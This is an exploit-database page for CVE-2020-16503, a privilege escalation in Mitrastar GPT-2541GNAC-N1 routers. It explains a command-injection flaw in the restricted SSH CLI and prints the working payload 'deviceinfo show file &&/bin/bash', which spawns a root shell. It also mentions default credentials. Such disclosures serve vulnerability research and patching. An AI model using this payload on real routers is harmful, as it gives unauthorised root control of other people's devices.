Mitrastar GPT-2541GNAC-N1 Privilege Escalation

CVE Category Price Severity
CVE-2020-16503 CWE-269 $5,000 - $25,000 High
Author Risk Exploitation Type Date
An independent security researcher High Local 2021-09-29
Our sensors found this exploit at:

Below is a copy:

Mitrastar GPT-2541GNAC-N1 Privilege Escalation
# Exploit Title: Mitrastar GPT-2541GNAC-N1 - Privilege escalation
# Date: 10-08-2021
# Exploit Author: Leonardo Nicolas Servalli
# Vendor Homepage:
# Platform: Mistrastar router devices GPT-2541GNAC-N1 (HGU)
# Tested on: Firmware BR_g3.5_100VNZ0b33
# Vulnerability analysis:



# Mitrastar GPT-2541GNAC-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases this routers use default credentials).

# The command deviceinfo show file <path> is used from reduced CLI to show files and directories. Because this command do not handle correctly special characters, is possible to insert a second command as a parameter on the <path> value. By using &&/bin/bash as parameter value we can spawn a bash console, as seen on the next example:


> deviceinfo show file &&/bin/bash

# This command will spawn a full interoperable bash console with root privileges.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.